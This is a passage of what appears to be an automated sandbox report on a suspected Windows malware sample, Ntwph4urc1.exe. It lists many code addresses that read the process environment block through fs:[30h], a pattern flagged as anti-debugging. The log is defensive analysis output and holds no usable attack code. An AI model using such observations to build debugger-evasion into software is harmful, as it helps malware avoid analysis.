      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF453 mov eax, dword ptr fs:[00000030h]6_2_369FF453
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB450 mov eax, dword ptr fs:[00000030h]6_2_369EB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB450 mov eax, dword ptr fs:[00000030h]6_2_369EB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB450 mov eax, dword ptr fs:[00000030h]6_2_369EB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB450 mov eax, dword ptr fs:[00000030h]6_2_369EB450
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B440 mov eax, dword ptr fs:[00000030h]6_2_3694B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B440 mov eax, dword ptr fs:[00000030h]6_2_3694B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B440 mov eax, dword ptr fs:[00000030h]6_2_3694B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B440 mov eax, dword ptr fs:[00000030h]6_2_3694B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B440 mov eax, dword ptr fs:[00000030h]6_2_3694B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B440 mov eax, dword ptr fs:[00000030h]6_2_3694B440
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1547F mov eax, dword ptr fs:[00000030h]6_2_36A1547F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941460 mov eax, dword ptr fs:[00000030h]6_2_36941460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941460 mov eax, dword ptr fs:[00000030h]6_2_36941460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941460 mov eax, dword ptr fs:[00000030h]6_2_36941460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941460 mov eax, dword ptr fs:[00000030h]6_2_36941460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941460 mov eax, dword ptr fs:[00000030h]6_2_36941460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F460 mov eax, dword ptr fs:[00000030h]6_2_3695F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F460 mov eax, dword ptr fs:[00000030h]6_2_3695F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F460 mov eax, dword ptr fs:[00000030h]6_2_3695F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F460 mov eax, dword ptr fs:[00000030h]6_2_3695F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F460 mov eax, dword ptr fs:[00000030h]6_2_3695F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F460 mov eax, dword ptr fs:[00000030h]6_2_3695F460
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CB594 mov eax, dword ptr fs:[00000030h]6_2_369CB594
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CB594 mov eax, dword ptr fs:[00000030h]6_2_369CB594
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A135B6 mov eax, dword ptr fs:[00000030h]6_2_36A135B6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693758F mov eax, dword ptr fs:[00000030h]6_2_3693758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693758F mov eax, dword ptr fs:[00000030h]6_2_3693758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693758F mov eax, dword ptr fs:[00000030h]6_2_3693758F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF5BE mov eax, dword ptr fs:[00000030h]6_2_369FF5BE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h]6_2_3696F5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D35BA mov eax, dword ptr fs:[00000030h]6_2_369D35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D35BA mov eax, dword ptr fs:[00000030h]6_2_369D35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D35BA mov eax, dword ptr fs:[00000030h]6_2_369D35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D35BA mov eax, dword ptr fs:[00000030h]6_2_369D35BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369DD5B0 mov eax, dword ptr fs:[00000030h]6_2_369DD5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369DD5B0 mov eax, dword ptr fs:[00000030h]6_2_369DD5B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615A9 mov eax, dword ptr fs:[00000030h]6_2_369615A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615A9 mov eax, dword ptr fs:[00000030h]6_2_369615A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615A9 mov eax, dword ptr fs:[00000030h]6_2_369615A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615A9 mov eax, dword ptr fs:[00000030h]6_2_369615A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615A9 mov eax, dword ptr fs:[00000030h]6_2_369615A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD5D0 mov eax, dword ptr fs:[00000030h]6_2_369BD5D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD5D0 mov ecx, dword ptr fs:[00000030h]6_2_369BD5D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369695DA mov eax, dword ptr fs:[00000030h]6_2_369695DA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369755C0 mov eax, dword ptr fs:[00000030h]6_2_369755C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615F4 mov eax, dword ptr fs:[00000030h]6_2_369615F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615F4 mov eax, dword ptr fs:[00000030h]6_2_369615F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615F4 mov eax, dword ptr fs:[00000030h]6_2_369615F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615F4 mov eax, dword ptr fs:[00000030h]6_2_369615F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615F4 mov eax, dword ptr fs:[00000030h]6_2_369615F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369615F4 mov eax, dword ptr fs:[00000030h]6_2_369615F4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A155C9 mov eax, dword ptr fs:[00000030h]6_2_36A155C9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A135D7 mov eax, dword ptr fs:[00000030h]6_2_36A135D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A135D7 mov eax, dword ptr fs:[00000030h]6_2_36A135D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A135D7 mov eax, dword ptr fs:[00000030h]6_2_36A135D7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36977505 mov eax, dword ptr fs:[00000030h]6_2_36977505
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36977505 mov ecx, dword ptr fs:[00000030h]6_2_36977505
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15537 mov eax, dword ptr fs:[00000030h]6_2_36A15537
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694D534 mov eax, dword ptr fs:[00000030h]6_2_3694D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694D534 mov eax, dword ptr fs:[00000030h]6_2_3694D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694D534 mov eax, dword ptr fs:[00000030h]6_2_3694D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694D534 mov eax, dword ptr fs:[00000030h]6_2_3694D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694D534 mov eax, dword ptr fs:[00000030h]6_2_3694D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694D534 mov eax, dword ptr fs:[00000030h]6_2_3694D534
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697D530 mov eax, dword ptr fs:[00000030h]6_2_3697D530
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697D530 mov eax, dword ptr fs:[00000030h]6_2_3697D530
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FB52F mov eax, dword ptr fs:[00000030h]6_2_369FB52F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h]6_2_369EF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h]6_2_369EF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h]6_2_369EF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h]6_2_369EF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h]6_2_369EF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h]6_2_369EF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h]6_2_369EF525
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB550 mov eax, dword ptr fs:[00000030h]6_2_369EB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB550 mov eax, dword ptr fs:[00000030h]6_2_369EB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB550 mov eax, dword ptr fs:[00000030h]6_2_369EB550
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697B570 mov eax, dword ptr fs:[00000030h]6_2_3697B570
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697B570 mov eax, dword ptr fs:[00000030h]6_2_3697B570
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B562 mov eax, dword ptr fs:[00000030h]6_2_3693B562
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A092A6 mov eax, dword ptr fs:[00000030h]6_2_36A092A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A092A6 mov eax, dword ptr fs:[00000030h]6_2_36A092A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A092A6 mov eax, dword ptr fs:[00000030h]6_2_36A092A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A092A6 mov eax, dword ptr fs:[00000030h]6_2_36A092A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697329E mov eax, dword ptr fs:[00000030h]6_2_3697329E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697329E mov eax, dword ptr fs:[00000030h]6_2_3697329E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C92BC mov eax, dword ptr fs:[00000030h]6_2_369C92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C92BC mov eax, dword ptr fs:[00000030h]6_2_369C92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C92BC mov ecx, dword ptr fs:[00000030h]6_2_369C92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C92BC mov ecx, dword ptr fs:[00000030h]6_2_369C92BC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15283 mov eax, dword ptr fs:[00000030h]6_2_36A15283
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369552A0 mov eax, dword ptr fs:[00000030h]6_2_369552A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369552A0 mov eax, dword ptr fs:[00000030h]6_2_369552A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369552A0 mov eax, dword ptr fs:[00000030h]6_2_369552A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369552A0 mov eax, dword ptr fs:[00000030h]6_2_369552A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D72A0 mov eax, dword ptr fs:[00000030h]6_2_369D72A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D72A0 mov eax, dword ptr fs:[00000030h]6_2_369D72A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B2D3 mov eax, dword ptr fs:[00000030h]6_2_3693B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B2D3 mov eax, dword ptr fs:[00000030h]6_2_3693B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B2D3 mov eax, dword ptr fs:[00000030h]6_2_3693B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A152E2 mov eax, dword ptr fs:[00000030h]6_2_36A152E2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F2D0 mov eax, dword ptr fs:[00000030h]6_2_3696F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F2D0 mov eax, dword ptr fs:[00000030h]6_2_3696F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369492C5 mov eax, dword ptr fs:[00000030h]6_2_369492C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369492C5 mov eax, dword ptr fs:[00000030h]6_2_369492C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF2F8 mov eax, dword ptr fs:[00000030h]6_2_369FF2F8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369392FF mov eax, dword ptr fs:[00000030h]6_2_369392FF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB2F0 mov eax, dword ptr fs:[00000030h]6_2_369EB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB2F0 mov eax, dword ptr fs:[00000030h]6_2_369EB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15227 mov eax, dword ptr fs:[00000030h]6_2_36A15227
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36977208 mov eax, dword ptr fs:[00000030h]6_2_36977208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36977208 mov eax, dword ptr fs:[00000030h]6_2_36977208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FB256 mov eax, dword ptr fs:[00000030h]6_2_369FB256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FB256 mov eax, dword ptr fs:[00000030h]6_2_369FB256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0D26B mov eax, dword ptr fs:[00000030h]6_2_36A0D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0D26B mov eax, dword ptr fs:[00000030h]6_2_36A0D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CD250 mov ecx, dword ptr fs:[00000030h]6_2_369CD250
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939240 mov eax, dword ptr fs:[00000030h]6_2_36939240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939240 mov eax, dword ptr fs:[00000030h]6_2_36939240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697724D mov eax, dword ptr fs:[00000030h]6_2_3697724D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36969274 mov eax, dword ptr fs:[00000030h]6_2_36969274
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36981270 mov eax, dword ptr fs:[00000030h]6_2_36981270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36981270 mov eax, dword ptr fs:[00000030h]6_2_36981270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3699739A mov eax, dword ptr fs:[00000030h]6_2_3699739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3699739A mov eax, dword ptr fs:[00000030h]6_2_3699739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E13B9 mov eax, dword ptr fs:[00000030h]6_2_369E13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E13B9 mov eax, dword ptr fs:[00000030h]6_2_369E13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E13B9 mov eax, dword ptr fs:[00000030h]6_2_369E13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369633A5 mov eax, dword ptr fs:[00000030h]6_2_369633A5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369733A0 mov eax, dword ptr fs:[00000030h]6_2_369733A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369733A0 mov eax, dword ptr fs:[00000030h]6_2_369733A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1539D mov eax, dword ptr fs:[00000030h]6_2_36A1539D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FB3D0 mov ecx, dword ptr fs:[00000030h]6_2_369FB3D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A153FC mov eax, dword ptr fs:[00000030h]6_2_36A153FC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF3E6 mov eax, dword ptr fs:[00000030h]6_2_369FF3E6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0132D mov eax, dword ptr fs:[00000030h]6_2_36A0132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0132D mov eax, dword ptr fs:[00000030h]6_2_36A0132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C930B mov eax, dword ptr fs:[00000030h]6_2_369C930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C930B mov eax, dword ptr fs:[00000030h]6_2_369C930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C930B mov eax, dword ptr fs:[00000030h]6_2_369C930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36937330 mov eax, dword ptr fs:[00000030h]6_2_36937330
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F32A mov eax, dword ptr fs:[00000030h]6_2_3696F32A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939353 mov eax, dword ptr fs:[00000030h]6_2_36939353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939353 mov eax, dword ptr fs:[00000030h]6_2_36939353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D34C mov eax, dword ptr fs:[00000030h]6_2_3693D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D34C mov eax, dword ptr fs:[00000030h]6_2_3693D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15341 mov eax, dword ptr fs:[00000030h]6_2_36A15341
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947370 mov eax, dword ptr fs:[00000030h]6_2_36947370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947370 mov eax, dword ptr fs:[00000030h]6_2_36947370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947370 mov eax, dword ptr fs:[00000030h]6_2_36947370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E3370 mov eax, dword ptr fs:[00000030h]6_2_369E3370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF367 mov eax, dword ptr fs:[00000030h]6_2_369FF367
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36945096 mov eax, dword ptr fs:[00000030h]6_2_36945096
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696D090 mov eax, dword ptr fs:[00000030h]6_2_3696D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696D090 mov eax, dword ptr fs:[00000030h]6_2_3696D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697909C mov eax, dword ptr fs:[00000030h]6_2_3697909C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CD080 mov eax, dword ptr fs:[00000030h]6_2_369CD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CD080 mov eax, dword ptr fs:[00000030h]6_2_369CD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D08D mov eax, dword ptr fs:[00000030h]6_2_3693D08D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369690DB mov eax, dword ptr fs:[00000030h]6_2_369690DB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD0C0 mov eax, dword ptr fs:[00000030h]6_2_369BD0C0
